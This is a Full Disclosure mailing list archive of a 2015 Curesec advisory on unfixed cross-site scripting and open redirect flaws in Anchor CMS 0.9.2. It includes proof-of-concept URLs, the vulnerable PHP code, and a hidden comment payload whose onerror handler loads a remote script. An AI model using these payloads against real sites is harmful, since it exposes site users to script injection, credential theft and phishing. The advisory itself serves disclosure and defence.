lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <55F6F2A8.8090608@curesec.com>
Date: Mon, 14 Sep 2015 18:15:36 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Anchor CMS 0.9.2 - XSS


Anchor CMS 0.9.2: XSS
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: 	Anchor CMS 0.9.2	
Fixed in: 		not fixed
Fixed Version Link: 	n/a	
Vendor Contact: 	Website: http://anchorcms.com/	
Vulnerability Type: 	XSS and Open Redirect	
Remote Exploitable: 	Yes	
Reported to vendor: 	07/30/2015	
Disclosed to public: 	09/14/2015	
Release mode: 		Full Disclosure	
CVE: 			n/a	
Credits 		Tim Coen of Curesec GmbH	

2. Vulnerability Description

Various components of Anchor CMS are vulnerable to cross site scripting.
With this, it is possible to inject and execute arbitrary JavaScript
code. This can for example be used by an attacker to inject a JavaScript
keylogger, bypass CSRF protection, or perform phishing attacks.

The attacks can be exploited by getting the victim to click a link or
visit an attacker controlled website.
XSS 1

The 404 error page of Anchor CMS outputs the URL that was visited. It
uses REQUEST_URI to do this, which can generally be considered
reasonably secure as most modern browsers URL encode it. However, it
then decodes it, opening it up for XSS.

Sample POC:

http://localhost/anchor-cms-0.9.2/test<script>alert(2)</script>

Code:

        /themes/default/404.php:6
            <p>Unfortunately, the page <code>/<?php echo current_url();
?></code> could not be found.

        /anchor/functions/helpers.php:34
            function current_url() {
	            return Uri::current();
            }

        /system/uri.php:81
	        public static function current() {
		        if(is_null(static::$current)) static::$current = static::detect();

		        return static::$current;
	        }
            [...]
	        public static function detect() {
                [...]
						        return static::format($uri, $server);
                [...]
	        }
            [...]
	        public static function format($uri, $server) {
		        // Remove all characters except letters,
		        // digits and $-_.+!*'(),{}|\\^~[]`<>#%";/?:@&=.
		        $uri = filter_var(rawurldecode($uri), FILTER_SANITIZE_URL);

		        // remove script path/name
		        $uri = static::remove_script_name($uri, $server);

		        // remove the relative uri
		        $uri = static::remove_relative_uri($uri);

		        // return argument if not empty or return a single slash
		        return trim($uri, '/') ?: '/';
	        }
XSS / Open Redirect

The default theme of Anchor CMS echoes the given URL inside HTML tags.
less-than and greater-than are properly encoded to protect against XSS,
but quotes are not encoded as ENT_NOQUOTES is used. This makes it
possible to break out of the context of the given attribute and add
further attributes.

The improper encoding of the URL leads to an Open Redirect vulnerability
which may aid in phishing attacks. Additionally, it may lead to XSS in
older browsers.

Sample POC:

        Open Redirect:

http://localhost/anchor-cms-0.9.2/search/foo;url=http://google.com"
HTTP-EQUIV="refresh"
It is also possible to inject a style attribute and thus gain XSS via
for example expression(), but this will only work for older browsers.
For some browsers it will also be possible to inject JavaScript via the
url parameter:


http://localhost/anchor-cms-0.9.2/search/foo;url=javascript:alert(1);"
HTTP-EQUIV="refresh"

Code:

        /themes/default/header.php:29
	            <meta property="og:url" content="<?php echo
e(current_url()); ?>">

        /system/helpers:78
        function e($str, $quotes = ENT_NOQUOTES) {
	        return htmlspecialchars($str, $quotes, Config::app('encoding'),
false);
        }
XSS (User)

It can be considered dangerous to let normal users post scripts, as this
leads to persistent XSS, which can easily bypass CSRF protection, and
thus a user could for example elevate their priviledge level to admin.
XSS (Comments)

Once comments are approved, they are not encoded anymore. It might be
easy for an attacker to hide for example <img src="img"
onerror="s=document.createElement('script');s.src='http://localhost/s.js';document.getElementById('tray').appendChild(s)">
from an inexperienced user inside a large comment with lots of HTML.
This would load a remote script, in which an attacker can perform the
actual attack.

3. Solution

This issue was not fixed by the vendor.

4. Report Timeline

07/21/2015 	Informed Vendor about Issue (no reply)
08/18/2015 	Reminded Vendor of release date (no reply)
09/14/2015 	Disclosed to public

5. Blog Reference:
http://blog.curesec.com/article/blog/Anchor-CMS-092-XSS-53.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ